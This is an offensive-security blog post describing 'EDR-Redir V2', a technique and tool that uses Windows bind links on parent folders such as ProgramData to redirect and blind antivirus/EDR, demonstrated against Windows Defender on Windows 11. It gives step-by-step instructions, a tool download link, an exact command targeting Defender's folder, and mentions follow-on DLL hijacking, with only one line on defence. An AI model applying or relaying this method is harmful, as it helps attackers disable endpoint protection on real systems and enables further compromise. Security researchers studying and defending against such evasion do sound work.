EDR-Redir V2: Blind EDR With Fake Program Files

Posted by on

EDR-Redir V2 loading image

 

I. INTRODUCTION

In previous articles, I demonstrated using Windows' bind link feature to block or redirect Antivirus/EDR from accessing their executable folder. You can review this article via the link:

Using EDR-Redir To Break EDR Via Bind Link and Cloud Filter 

However, some EDRs provide good protection for their operating folders, resulting in failed bind link creation.

This time, I will upgrade EDR-Redir to version V2. Of course, I will still use bind link technology, but in a completely different way.

I will experiment with EDR-Redir V2 using Windows Defender on Windows 11. With this new approach, I'm quite confident it will work with many Antivirus/EDR solutions.

Find me on X to get the latest pentest and red team tricks that I've been researching: Two Seven One Three (@TwoSevenOneT) / X


II. MAIN SECTION

1. The Idea Behind Working With EDR-Redir V2

When software is installed on Windows, it typically resides in a subfolder, such as Program Files, Program Files (x86), ProgramData, and so on.

Antivirus and EDR software are no exception; most of them are located in either Program Files or Program Files (x86). Windows Defender, however, is found in ProgramData.

Antivirus and EDRs, in order to protect their operating folders, typically prevent writing files there. However, they cannot stop file writing to their parent folder. For example, if they block writing to the Program Files folder, they inadvertently prevent other software from being installed on the machine, which can cause significant inconvenience for users.

So why not think outside the box? Instead of creating a bind link to the EDR's folder, we could create a bind link to the Program Files folder, for example.

When dealing with the Program Files folder, we encounter the issue of ensuring that other software, aside from the EDR, functions normally. The idea here is to create bind links so that a folder points back to itself.

EDR-Redir V2 bind link point to itself

The steps to implement this idea are as follows (I will provide an example using the Program Files folder):

  1. Query all the folders within the Program Files folder.
  2. Create corresponding folders in a location you fully control (C:\TMP\TEMPDIR).
  3. Create bind links from the folders in Program Files that point to their corresponding folders in C:\TMP\TEMPDIR.
  4. Continue creating bind links from C:\TMP\TEMPDIR that point to the corresponding folders in Program Files. This will create a loop, causing access to the folders in Program Files to circle back to themselves. Most importantly, we will not create a bind link for the EDR's folder at this stage.
  5. Create a bind link from Program Files to C:\TMP\TEMPDIR to force the redirection of the EDR's folder through TEMPDIR.
  6. At this point, you can perform DLL hijacking by dropping executable files that the EDR usually interacts with into TEMPDIR, allowing you to leverage them to activate in place of the EDR.

Once these steps are successfully completed, we may be able to effectively redirect even the most stubborn types of EDRs.

2. Experimenting With EDR-Redir V2 Using Windows Defender

First, you can download EDR-Redir via the link below.

https://github.com/TwoSevenOneT/EDR-Redir


Windows Defender on Windows 11 is located at C:\ProgramData\Microsoft\. Therefore, I will target this folder for the attack.

I will run EDR-Redir with the following parameters:

EDR-Redir.exe C:\ProgramData\Microsoft c:\TMP\TEMPDIR "C:\ProgramData\Microsoft\Windows Defender"

C:\ProgramData\Microsoft is the folder I need to redirect elsewhere.

C:\TMP\TEMPDIR is the target folder.

C:\ProgramData\Microsoft\Windows Defender is the exception folder; it will not have a link loop created to block Defender.

EDR-Redir V2 run successfully with Windows Defender

During execution, EDR-Redir will print to the console information about which bind links will be created for easier monitoring. As shown in the results, I successfully redirected Windows Defender to C:\TMP\TEMPDIR.

EDR-Redir V2 successfully redirect Windows Defender to other location

At this point, Windows Defender will always see the folder C:\TMP\TEMPDIR as the parent folder of its operating folder.

3. Demo Video

III. INFERENCE

Antivirus/EDR can only protect their operating folders; they cannot intervene in the parent folders of these directories. Once the parent folder is successfully attacked, the protection of the operating folders by the EDR becomes meaningless.

When programming, many developers may not consider the possibility of a folder like Program Files being redirected. Therefore, I suspect that the list of EDRs affected by this technique will be quite extensive.

The defensive approach is to monitor the use of bind links with folders like Program Files to ensure they aren't tampered with by the hands of attackers.

IV. READING

Some books you should read to sharpen your cybersecurity skills, especially in offensive security:

Books on Programming and Cybersecurity recommended by Zero Salarium Researchers

Essential hardware tools that every security researcher and hacker should have in their toolkit:

Hardware Tools For Security Researcher and Hacker


Author of the articleTwo Seven One Three

Comments

Post a Comment